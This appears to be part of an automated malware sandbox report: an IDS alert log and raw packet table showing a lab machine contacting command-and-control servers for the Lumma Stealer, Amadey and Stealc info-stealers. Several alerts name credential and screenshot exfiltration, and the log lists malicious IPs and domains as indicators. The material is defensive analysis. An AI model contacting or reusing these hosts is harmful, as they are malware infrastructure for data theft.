2024-12-22T02:18:54.885994+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50240	104.21.67.146	443	TCP
2024-12-22T02:18:54.885994+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50240	104.21.67.146	443	TCP
2024-12-22T02:18:55.118304+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50242	104.21.89.115	443	TCP
2024-12-22T02:18:56.513771+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50246	104.21.21.99	443	TCP
2024-12-22T02:18:56.513771+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50246	104.21.21.99	443	TCP
2024-12-22T02:18:56.542531+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50247	104.21.67.146	443	TCP
2024-12-22T02:18:57.308338+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50247	104.21.67.146	443	TCP
2024-12-22T02:18:57.308338+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50247	104.21.67.146	443	TCP
2024-12-22T02:18:57.563608+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50250	104.21.89.115	443	TCP
2024-12-22T02:18:58.413276+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	50250	104.21.89.115	443	TCP
2024-12-22T02:18:58.504689+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50252	212.193.31.8	80	TCP
2024-12-22T02:18:59.069531+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50253	104.21.21.99	443	TCP
2024-12-22T02:18:59.069531+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50253	104.21.21.99	443	TCP
2024-12-22T02:18:59.716293+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50254	104.21.89.115	443	TCP
2024-12-22T02:19:02.605590+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50263	104.21.89.115	443	TCP
2024-12-22T02:19:03.057225+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50264	104.21.67.146	443	TCP
2024-12-22T02:19:04.170244+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	50264	104.21.67.146	443	TCP
2024-12-22T02:19:05.019592+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50269	212.193.31.8	80	TCP
2024-12-22T02:19:05.407782+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50274	104.21.67.146	443	TCP
2024-12-22T02:19:05.778609+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50276	104.21.21.99	443	TCP
2024-12-22T02:19:05.778609+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50276	104.21.21.99	443	TCP
2024-12-22T02:19:05.988229+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	50276	104.21.21.99	443	TCP
2024-12-22T02:19:08.412953+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50284	104.21.89.115	443	TCP
2024-12-22T02:19:08.699676+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50286	104.21.67.146	443	TCP
2024-12-22T02:19:08.740055+0100	2058361	ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)	1	192.168.2.4	50287	104.21.21.99	443	TCP
2024-12-22T02:19:08.740055+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50287	104.21.21.99	443	TCP
2024-12-22T02:19:09.526983+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50287	104.21.21.99	443	TCP
2024-12-22T02:19:09.972691+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50288	185.215.113.206	80	TCP
2024-12-22T02:19:10.971606+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50292	104.21.67.146	443	TCP
2024-12-22T02:19:10.985979+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	50291	185.215.113.16	80	TCP
2024-12-22T02:19:12.013779+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50295	212.193.31.8	80	TCP
2024-12-22T02:19:13.258407+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50298	104.21.89.115	443	TCP
2024-12-22T02:19:13.712201+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50299	104.21.67.146	443	TCP
2024-12-22T02:19:14.023689+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50298	104.21.89.115	443	TCP
2024-12-22T02:19:16.361190+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50302	185.215.113.206	80	TCP
2024-12-22T02:19:17.756437+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50304	104.21.67.146	443	TCP
2024-12-22T02:19:18.107488+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50306	212.193.31.8	80	TCP
2024-12-22T02:19:18.795844+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50304	104.21.67.146	443	TCP
2024-12-22T02:19:23.289904+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50325	185.215.113.206	80	TCP
2024-12-22T02:19:24.372914+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50339	212.193.31.8	80	TCP
2024-12-22T02:19:30.427962+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50358	212.193.31.8	80	TCP
2024-12-22T02:19:30.539459+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	50357	185.215.113.206	80	TCP
2024-12-22T02:19:36.491350+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50366	212.193.31.8	80	TCP
2024-12-22T02:19:42.735546+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50372	212.193.31.8	80	TCP
2024-12-22T02:19:48.787598+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50386	212.193.31.8	80	TCP
2024-12-22T02:19:54.809650+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50402	212.193.31.8	80	TCP
2024-12-22T02:20:00.842641+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50406	212.193.31.8	80	TCP
2024-12-22T02:20:06.879631+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50412	212.193.31.8	80	TCP
2024-12-22T02:20:12.916411+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50416	212.193.31.8	80	TCP
2024-12-22T02:20:19.013424+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50428	212.193.31.8	80	TCP
2024-12-22T02:20:25.065544+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50435	212.193.31.8	80	TCP
2024-12-22T02:20:31.444346+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50447	212.193.31.8	80	TCP
2024-12-22T02:20:37.472580+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50451	212.193.31.8	80	TCP
2024-12-22T02:20:43.538037+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50455	212.193.31.8	80	TCP
2024-12-22T02:20:49.577276+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50460	212.193.31.8	80	TCP
2024-12-22T02:20:55.616587+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50472	212.193.31.8	80	TCP
2024-12-22T02:21:01.671951+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50476	212.193.31.8	80	TCP
2024-12-22T02:21:07.721338+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50489	212.193.31.8	80	TCP
2024-12-22T02:21:13.780895+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50496	212.193.31.8	80	TCP
2024-12-22T02:21:16.862732+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.4	50498	212.193.31.8	80	TCP
2024-12-22T02:21:19.849771+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50500	212.193.31.8	80	TCP
2024-12-22T02:21:19.958374+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	50497	TCP
2024-12-22T02:21:21.319108+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50501	185.215.113.43	80	TCP
2024-12-22T02:21:25.987851+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50504	212.193.31.8	80	TCP
2024-12-22T02:21:31.440183+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	50505	TCP
2024-12-22T02:21:32.143982+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50508	212.193.31.8	80	TCP
2024-12-22T02:21:32.795375+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50509	185.215.113.43	80	TCP
2024-12-22T02:21:33.495571+0100	2058397	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click)	1	192.168.2.4	56639	1.1.1.1	53	UDP
2024-12-22T02:21:34.966397+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	50517	172.67.209.202	443	TCP
2024-12-22T02:21:34.966397+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50517	172.67.209.202	443	TCP
2024-12-22T02:21:35.728718+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50517	172.67.209.202	443	TCP
2024-12-22T02:21:35.728718+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50517	172.67.209.202	443	TCP
2024-12-22T02:21:36.960526+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	50520	172.67.209.202	443	TCP
2024-12-22T02:21:36.960526+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50520	172.67.209.202	443	TCP
2024-12-22T02:21:37.739791+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50520	172.67.209.202	443	TCP
2024-12-22T02:21:37.739791+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50520	172.67.209.202	443	TCP
2024-12-22T02:21:38.319056+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50521	212.193.31.8	80	TCP
2024-12-22T02:21:39.594134+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	50523	172.67.209.202	443	TCP
2024-12-22T02:21:39.594134+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50523	172.67.209.202	443	TCP
2024-12-22T02:21:41.997027+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	50526	172.67.209.202	443	TCP
2024-12-22T02:21:41.997027+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50526	172.67.209.202	443	TCP
2024-12-22T02:21:42.902536+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	50526	172.67.209.202	443	TCP
2024-12-22T02:21:44.206069+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	50527	172.67.209.202	443	TCP
2024-12-22T02:21:44.206069+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50527	172.67.209.202	443	TCP
2024-12-22T02:21:44.448509+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50528	212.193.31.8	80	TCP
2024-12-22T02:21:46.956179+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	50533	172.67.209.202	443	TCP
2024-12-22T02:21:46.956179+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50533	172.67.209.202	443	TCP
2024-12-22T02:21:49.582086+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	50541	172.67.209.202	443	TCP
2024-12-22T02:21:49.582086+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50541	172.67.209.202	443	TCP
2024-12-22T02:21:50.516015+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	50541	172.67.209.202	443	TCP
2024-12-22T02:21:50.569457+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50542	212.193.31.8	80	TCP
2024-12-22T02:21:51.742096+0100	2058398	ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI)	1	192.168.2.4	50544	172.67.209.202	443	TCP
2024-12-22T02:21:51.742096+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50544	172.67.209.202	443	TCP
2024-12-22T02:21:52.503723+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50544	172.67.209.202	443	TCP
2024-12-22T02:21:56.661111+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50547	212.193.31.8	80	TCP
2024-12-22T02:22:02.827085+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50558	212.193.31.8	80	TCP
2024-12-22T02:22:08.898113+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50562	212.193.31.8	80	TCP
2024-12-22T02:22:14.962769+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50567	212.193.31.8	80	TCP
2024-12-22T02:22:19.546142+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	50568	TCP
2024-12-22T02:22:20.898558+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50571	185.215.113.43	80	TCP
2024-12-22T02:22:21.049253+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50572	212.193.31.8	80	TCP
2024-12-22T02:22:27.127593+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50580	212.193.31.8	80	TCP
2024-12-22T02:22:33.170948+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50584	212.193.31.8	80	TCP
2024-12-22T02:22:39.360469+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50595	212.193.31.8	80	TCP
2024-12-22T02:22:45.413451+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50598	212.193.31.8	80	TCP
2024-12-22T02:22:51.686427+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50604	212.193.31.8	80	TCP
2024-12-22T02:22:55.690496+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.4	50605	TCP
2024-12-22T02:22:57.055457+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.4	50608	185.215.113.43	80	TCP
2024-12-22T02:22:57.752693+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50610	212.193.31.8	80	TCP
2024-12-22T02:23:01.348439+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50614	104.21.89.115	443	TCP
2024-12-22T02:23:02.125625+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	50614	104.21.89.115	443	TCP
2024-12-22T02:23:02.125625+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50614	104.21.89.115	443	TCP
2024-12-22T02:23:03.386494+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50616	104.21.89.115	443	TCP
2024-12-22T02:23:03.841486+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50617	212.193.31.8	80	TCP
2024-12-22T02:23:04.162121+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	50616	104.21.89.115	443	TCP
2024-12-22T02:23:04.162121+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50616	104.21.89.115	443	TCP
2024-12-22T02:23:05.657501+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50618	104.21.89.115	443	TCP
2024-12-22T02:23:07.823180+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50622	104.21.89.115	443	TCP
2024-12-22T02:23:09.910578+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50623	212.193.31.8	80	TCP
2024-12-22T02:23:10.352798+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50624	104.21.89.115	443	TCP
2024-12-22T02:23:12.541103+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50633	104.21.89.115	443	TCP
2024-12-22T02:23:13.308374+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	50633	104.21.89.115	443	TCP
2024-12-22T02:23:14.735602+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50636	104.21.89.115	443	TCP
2024-12-22T02:23:15.693434+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	50636	104.21.89.115	443	TCP
2024-12-22T02:23:15.963476+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50637	212.193.31.8	80	TCP
2024-12-22T02:23:16.932736+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50639	104.21.89.115	443	TCP
2024-12-22T02:23:17.711754+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	50639	104.21.89.115	443	TCP
2024-12-22T02:23:21.997068+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50642	212.193.31.8	80	TCP
2024-12-22T02:23:28.044776+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50646	212.193.31.8	80	TCP
2024-12-22T02:23:34.099774+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50650	212.193.31.8	80	TCP
2024-12-22T02:23:40.143509+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50654	212.193.31.8	80	TCP
2024-12-22T02:23:46.212321+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50665	212.193.31.8	80	TCP
2024-12-22T02:23:52.318557+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50669	212.193.31.8	80	TCP
2024-12-22T02:23:58.364622+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50673	212.193.31.8	80	TCP
2024-12-22T02:24:04.447895+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50677	212.193.31.8	80	TCP
2024-12-22T02:24:10.519028+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50681	212.193.31.8	80	TCP
2024-12-22T02:24:16.568999+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	50685	212.193.31.8	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 22, 2024 02:16:05.881716967 CET	49753	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:06.001594067 CET	80	49753	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:06.006066084 CET	49753	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:06.006340981 CET	49753	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:06.125813961 CET	80	49753	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:07.338330030 CET	80	49753	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:07.338428974 CET	49753	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:08.842034101 CET	49753	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:08.842477083 CET	49759	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:08.962080002 CET	80	49759	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:08.962182999 CET	49759	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:08.962223053 CET	80	49753	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:08.962286949 CET	49753	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:08.962471008 CET	49759	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:09.082061052 CET	80	49759	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:10.341069937 CET	80	49759	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:10.341134071 CET	80	49759	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:10.341151953 CET	49759	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:10.341191053 CET	49759	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:10.575788975 CET	80	49759	185.215.113.43	192.168.2.4
Dec 22, 2024 02:16:10.575920105 CET	49759	80	192.168.2.4	185.215.113.43
Dec 22, 2024 02:16:10.584830999 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:10.704441071 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:10.704564095 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:10.704891920 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:10.824410915 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.042447090 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.042486906 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.042541027 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.042670965 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.042712927 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.042751074 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.042784929 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.042784929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.042814016 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.042840004 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.043080091 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.043117046 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.043167114 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.043167114 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.043232918 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.043267965 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.043299913 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.043381929 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.162758112 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.162846088 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.162863970 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.162926912 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.166798115 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.166882038 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.233814955 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.233963013 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.234010935 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.234075069 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.238048077 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.238106966 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.238138914 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.238190889 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.246345997 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.246403933 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.246499062 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.246550083 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.254730940 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.254786968 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.254858971 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.254911900 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.263103962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.263195992 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.263426065 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.263479948 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.271467924 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.271526098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.271600962 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.271657944 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.279902935 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.279959917 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.280019045 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.280076981 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.288239002 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.288302898 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.288361073 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.288412094 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.296644926 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.296704054 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.296757936 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.296802998 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.305424929 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.305480003 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.305516958 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.305550098 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.313503981 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.313575983 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.313621044 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.313678026 CET	49765	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:12.353894949 CET	80	49765	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:12.354002953 CET	80	49765	31.41.244.11	192.168.2.4
